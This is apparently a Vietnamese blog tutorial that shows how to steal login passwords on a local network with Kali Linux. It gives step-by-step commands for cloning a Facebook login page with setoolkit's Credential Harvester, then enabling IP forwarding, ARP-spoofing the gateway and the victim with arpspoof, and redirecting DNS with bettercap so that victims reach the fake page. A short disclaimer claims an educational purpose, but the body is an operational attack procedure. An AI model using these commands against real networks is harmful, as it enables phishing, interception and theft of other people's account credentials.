Hướng dẫn Hack Password trong mạng lan bằng kali linux
hack password trong mạng lan là phương pháp làm giả trang web login của trang web chúng ta cần đánh cắp thông tin và dùng dns spoof để chuyển hướng trang web thật sang trang web giả của chúng ta.
Kĩ thuật này nhằm cho các bạn định hình được cách tấn công của các hacker từ đó đưa ra các bạn biện pháp phòng tránh hoặc học hỏi các kiến thức cũng như các công cụ trong phần này. Cảnh báo: Không được lạm dụng để trục lợi cho bản thân, không được thực hành đánh cắp thông tin của người khác trong mạng lan.chúng tôi không chịu trách nhiệm về hành vi trái phép của bạn.
Hack password trong mạng lan bằng kali linux
Bạn có thể tham khảo thêm bài viết: Hack wifi bằng fluxion trên Kali Linux
Trước khi bắt đầu kĩ thuật này bạn cần chuẩn bị những công cụ sau:
Kali Linux: a href=”https://www.kali.org/downloads/”>
Settoolkit
Ettercap hoặc bettercap
Hướng dẫn cách hack password trong mạng lan
Bước 1: Các bạn đăng nhập Kali Linux và mở hộp thoại dòng lệnh
Chạy các dòng lệnh sau:
service apache2 star
setoolkit
Tí mình sẽ nói vài video demo và giải thích rõ cho mấy bạn nhé
Đây là công cụ setoolkit trong kalilinux
Các bạn chọn 1) Social – Engineering Attacks > 2) website attacks vector > 3) Credential Harvester attacks method > 2) Site cloner
Sau đó các bạn tiến hành gõ ip của hacker ( ở đây mình đang demo nên mình đang là vai trò của một hacker )
Các bạn mở cửa sổ dòng lệnh mới gõ lệnh:
ifconfig
Để kiểm tra ip nhé
Tiếp theo các bạn nhập ip vào và trang web các bạn cần giả mạo nhé
Ở đây mình demo là facebook.com nhé các bạn có thể chọn bất cứ trang nào.
Sau khi xong bước này các bạn đã fake thành công một trang web một cách đơn gian với công cụ setoolkit trong Kali Linux rồi.
P/s: Các bạn có thể lấy máy khác cùng mạng lan và vào thử ip của các bạn sẽ ra trang đăng nhập facebook.com nhé
Bước 2: Ở bước 1 chúng ta đã fake thành công một trang web nhưng không ai dại dột mà nhập mật khẩu và tài khoản vào cái ip của chúng ta cả vì thế việc chúng ta cần làm là khi nạn nhân vào facebook.com chính thống sẽ ra trang facebook giả mạo của chúng ta tức là ip của chúng ta.
Lưu ý: Một số trình duyệt hiện tại đã nâng cấp để vá lỗi này nên các bạn chỉ thực hành được trên các trình duyệt chưa nâng cấp thôi. Sau bài viết này mình khuyên các bạn nên cập nhật trình duyệt thường xuyên để tránh làm nạn nhân của các tin tặc nhé.
Các bạn chạy các lệnh sau:
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t 192.168.100.1 192.168.100.2
Sau đó các bạn mở một cửa sổ dòng lệnh mới chạy tiếp lệnh:
arpspoof -i wlan0 -t 192.168.100.2 192.168.100.1
Các bạn tạo một file Leafpad bằng dòng lệnh:
Leafpad hosts.conf
Điền trang web và địa chỉ ip các bạn cần fake nhé. Lưu lại.
Mở tiếp một cửa sổ dòng lệnh chạy lệnh:
bettercap -I wlan0 -G 192.168.100.1 -T 192.168.100.2 –dns hosts.conf
ok. Vậy là nạn nhân trong mạng lan lúc đăng nhập vào facebook thật sẽ chuyển
sang facebook fake bằng địa chỉ ip của bạn